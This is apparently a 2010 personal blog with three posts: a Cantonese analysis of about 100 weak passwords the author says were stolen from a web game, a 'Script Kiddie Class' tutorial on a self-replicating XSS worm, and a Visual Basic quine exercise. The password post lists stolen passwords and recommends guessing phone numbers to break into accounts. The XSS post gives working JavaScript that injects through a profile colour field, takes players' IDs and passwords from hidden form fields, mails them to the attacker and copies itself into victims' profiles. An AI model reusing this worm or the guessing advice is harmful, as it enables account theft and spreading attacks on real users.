2010年12月26日 星期日

Password Pattern Study

我懷疑我打中文先會有人睇,所以打中文。不過我估今次呢篇更加冇人想睇。

最近有人撩我玩某隻網頁遊戲,隻Game穿晒窿,後來放幾條蟲偷到一堆密碼,一堆弱密碼。
咩係弱密碼?一般來說,一個人會有幾組密碼,每組密碼都有特別用途。如果用響D緊要既網站,例如網上銀行、主要電郵,個密碼應該會係亂到唔知似乜 (如果你既強密碼唔係咁,咁你小心D啦)。至於一D無關痛癢既網,例如某D成日要你註冊左先可以下載附件既論壇,通常你D帳號密碼都係亂咁打架啦,呢D就係弱密碼。
拿到咁多好野梗係要研究下。今次要研究既係究竟D人最常用D乜來做弱密碼,同埋個密碼同帳號有咩關係。

數據數目:100,91個不同帳號,有5個改過一次密碼,有2個改過兩次密碼
帳號及密碼限制:4-8 英數字元、帳號不等於密碼 (個程式係咁定,唔關我事)
數據收集方法:唔講啦。

首先剩係睇下堆密碼:

長度分佈:
13% 4個字
4% 5個字
23% 6個字
8% 7個字
52% 8個字

結論:4-8個字密碼,8個字最多人用。雙數字最多人用,單數字比較少,得12%。

字元分佈:
53% 只用數字做密碼
10% 只用小楷英文做密碼
0% 只用大楷英文做密碼

100個密碼加埋總共有682個字元 (4*13+5*4+6*23+7*8+8*52)
74.3% 數字 (507)
25.2% 小楷英文 (172)
0.4% 大楷英文 (3)

結論:數字好受歡迎,全數字值得撞下。

各字元分佈:
8.06% - 0
12.17% - 1
10.12% - 2
7.04% - 3
5.72% - 4
5.87% - 5
7.18% - 6
5.87% - 7
5.57% - 8
6.74% - 9

2.79% - a
1.17% - b
0.73% - c
0.59% - d
1.32% - e
0.73% - f
1.61% - g
1.32% - h
2.49% - i
0.15% - j
1.76% - k
1.32% - l
1.03% - m
1.03% - n
0.73% - o
0.59% - p
0.00% - q
1.17% - r
0.88% - s
0.44% - t
1.32% - u
0.15% - v
0.15% - w
0.59% - x
0.59% - y
0.59% - z

0.15% - C
0.15% - K
0.15% - O
0.00% - OTHERS

都係數字最多架啦。數字最多至最少排序:
1, 2, 0, 6, 3, 9, 5, 7, 4, 8

小楷英文冇 q 用,我估係因為D人鍾意打英文生字。


重點研究:全數字特徵
密碼 4 個字:
1100, 1230, 1234, 1234, 1234, 1239, 1397, 2177, 2587, 5354, 6335
都幾多123_。自己試下響 Numpad 按下。

密碼 5 個字:
24622, 24622
重覆係因為條友開分身。

密碼 6 個字:
061093, 101091, 123321, 159005, 369258, 701226, 753951, 852456, 881029, 941123, 941123, 950219, 951753, 951753

都幾多疑似日期架喎。
ddmmyy: 061093, 101091
yymmdd: 701226, 881029, 941123, 941123, 950219
其他: 123321, 159005, 369258, 753951, 852456, 951753, 951753
又係自己用 Numpad 按下,好多連續鍵。

密碼 7 個字:
4560852
又係連續鍵啦

密碼 8 個字:
10260816, 10260816, 11181118, 11447788, 13191212, 17138045, 19940403, 19970422, 20001003, 20112012, 24687913, 疑似2字頭電話1, 疑似2字頭電話1, 疑似2字頭電話2, 疑似2字頭電話3, 疑似2字頭電話4, 疑似2字頭電話5, 疑似2字頭電話6, 疑似3字頭電話1, 疑似3字頭電話1, 疑似6字頭電話1, 疑似6字頭電話2, 疑似6字頭電話3, 疑似6字頭電話4, 疑似9字頭電話1

為保障參與者(?)私隱,部份疑似電話既密碼將被隱藏。
今次又有D疑似日期:mmddmmdd, yyyymmdd, (yyyyddmm? 我唔覺係囉。)

睇黎好多電話。如果你想撞人地D爛密碼,撞電話最好啦。
有人有興趣先再講。

2010年12月21日 星期二

Script Kiddie Class: Quine in XSS

Last time I demonstrated how to create a quine program, which output its own program code. This time I will talk about how can a malicious javascript code reproduces itself and infect to others.

In web applications, one critical vulnerability to users is Cross-site Scripting (XSS), which allows someone to inject client-side scripting code to the webpage. The following example is based on a real web game (with some modification):

Scenario (Ignore it if you don't like to read bullshxts)
Xyzzy Agora is a multi-player web-based game. Players can create their own character to join the virtual adventure. Just like other web-based role-play games, players can assign their own ID, password, nickname, color, avatar, battle slogan and website link during registration, which could be changed after registration except ID and nickname. Also, players can allocate additional stats points to their default abilities (5 points each) based on a random number.

After registration or after logging in, players will be redirected to a main street page. They can start adventure, buy weapons or equipments, train for their abilities, train their pets, ask NPCs for adventure information, battle with other players, change their information, send gifts to other players, send private message to other players, or go to the chat room. These actions are labeled in different buttons, and each button have its own form, with user ID, password, and action ID as hidden fields, where the button is the submit button of the form. On the top of each pages, the current online users are shown in a row, with the link to the corresponding profile page.

The nickname of a character is displayed as following:
<font color=**COLOR**>**NICKNAME**</font>
where **COLOR** is the color selected from a drop down list by the player during registration or profile update, and **NICKNAME** is the nickname picked during registration. Colored nickname will be displayed at every pages. Other players' colored nickname could be displayed at player's profile page, private message page, and chat room.

Vulnerabilities
1) The color attribute of a player's profile does not have proper XSS control. People can inject client-side script to the pages which displays other players' nickname.
2) User ID and password are stored in hidden fields of any pages after login. With XSS, people can extract those data by DOM easily.
3) Color attribute could be updated in the profile page. By using Quine in XSS, other player could be infected. The person who original post the code could remove it after someone has infected. This could be difficult to trace if there is no proper activity logs.
4) Private message will only shown to receiver. Sender has no idea about what message he has sent. For simplicity, the username and password will be sent to the attacker by private message, instead of sending to other website. (But this could be easily checked by the web game administrator)

Steps of Attack
1. Test for the XSS vulnerability by changing the color attribute in profile update page (profile.php)
0><script>alert('XSS')</script
Then the nickname will be displayed like this:
<font color=0><script>alert('XSS')</script>**NICKNAME**</font>

2. Identify the target XSS pages:
The highest traffic page among those potential XSS pages is chat room. The script should be able to run properly in the chat room (chat.php). Running on the player profile page and private message page would be a plus. You may also need to consider that players' own colored name will be shown on every pages, and you should avoid trigger your program too many times, as the private message has limit.

3. Write a password stealer
This example will used AJAX, since the destination (pm.php) is in the same domain.
function x(){try{return new XMLHttpRequest}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP')}catch(e){}}}
d=document.forms[0];i=d.uid.value;p=encodeURIComponent(d.pass.value);
u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;
a=x();a.open('GET',u);a.send();
Explanation:
First line - return the XMLHttpObject (copied and modified from jQuery, to make it short)
Second line: store the victim's user ID and password, given that each pages' first form will store user ID in "uid" field, and password in "pass" field. encodeURIComponent would be useful to prevent broken links due to special characters in password.
Third line: the page that you want the victim to open, which will send the user ID and password to "someone".
Fourth line: send the get request via AJAX.

4. Write a code injector
Apart from stealing password, we are also interested in changing victim's color attribute, and spread the XSS worm. The XMLHttpObject and the stored user ID and password will be reused in the following script:
v='profile.php?uid='+i+'&pass='+p+'&color=*XSS CODE HERE*';
b=x();b.open('GET',v);b.send()
Now the problem is how to put back the entire program with XSS back to the color's parameter. The concept of Quine become useful in this problem. A javascript Quine is easier than other programming language, since javascript can refer to its function:
function $(){_=$+'$()'}$()
(I intentionally use some funny characters for the function name and variable name)
This code will run the $ function, and the entire program is stored in _ variable. You can put any code before or after the script like this:
function $(){document.write($+'$()');_=$+'$()';alert(_)}$()
The entire program is still stored in _ variable.
Now we can put all things together. Before that, I added some shortcut variables for some special characters:
l=String.fromCharCode(60);g=String.fromCharCode(62);
1+3+4 (In one single line):
0><script>
function $(){_=$+'$()';l=String.fromCharCode(60);g=String.fromCharCode(62);
function x(){try{return new XMLHttpRequest}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP')}catch(e){}}}
d=document.forms[0];i=d.uid.value;p=d.pass.value;
u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;
a=x();a.open('GET',u);a.send();
v='profile.php?uid='+i+'&pass='+p+'&color=0'+encodeURIComponent(g+l+'script'+g+_+l+'/script'); b=x();b.open('GET',v);b.send()}$()
</script
Using this as your color attribute will give the first wave of XSS worm.

Remark

Referring a function in javascript may result in having additional line breaks and tabs. I have another code which make use of eval, and uses unescape for easier coding:
v='q=String.fromCharCode(39);w=%27v=%27+q+v+q+%27;eval(unescape(v))%27;alert(w);';eval(unescape(v))
Replace alert(w) for your code.
Another remark is to consider running multiple times of the program. You may use body onload event to force the XSS code run once even it appears in the same page many times. You may also need to add conditions to prevent running the code on some undesired pages.

If you are interested in this scenario or example, you may ask me for a prototype demo. (Well, I think no one will read this bullshxt :D)

2010年12月20日 星期一

Script Kiddie Class: Quine

How can a program output its program code in runtime? It could be quite difficult. Let's see an example in VB:

Debug.Print("Code")
The output is Code, but I want the output to be Debug.Print("Code").

Debug.Print("Debug.Print(""Code"")")
Now the output is Debug.Print("Code"), but the program code has already changed, and I want Debug.Print("Debug.Print(""Code"")") now.


It would be rather difficult if you just directly print something. To write a quine program, you should have your program code stored in a string for output.

Example:

Function Q(x) As String
t = Split(x, vbCrLf)
For i = 0 To UBound(t) - 1
Q = Q & Chr(34) & Replace(t(i), Chr(34), Chr(34) & Chr(34)) & Chr(34) & " & vbCrLf & _" & vbCrLf & vbTab & vbTab
Next
Q = Q & Chr(34) & t(i) & Chr(34)
End Function

Sub Form_Load()
V = "Function Q(x) As String" & vbCrLf & _
" t = Split(x, vbCrLf)" & vbCrLf & _
" For i = 0 To UBound(t) - 1" & vbCrLf & _
" Q = Q & Chr(34) & Replace(t(i), Chr(34), Chr(34) & Chr(34)) & Chr(34) & "" & vbCrLf & _"" & vbCrLf & vbTab & vbTab" & vbCrLf & _
" Next" & vbCrLf & _
" Q = Q & Chr(34) & t(i) & Chr(34)" & vbCrLf & _
"End Function" & vbCrLf & _
"" & vbCrLf & _
"Sub Form_Load()" & vbCrLf & _
" V = ?" & vbCrLf & _
" Debug.Print Replace(V, Chr(63), Q(V))" & vbCrLf & _
"End Sub"
Debug.Print Replace(V, Chr(63), Q(V))
End Sub
The entire program is stored in V, and the function Q is to escape the string, and the question mark (chr 63) is to assign the escaped program code string to variable V.



Looks funny but messy. Then what is the purpose of doing this? ... I'll tell you later.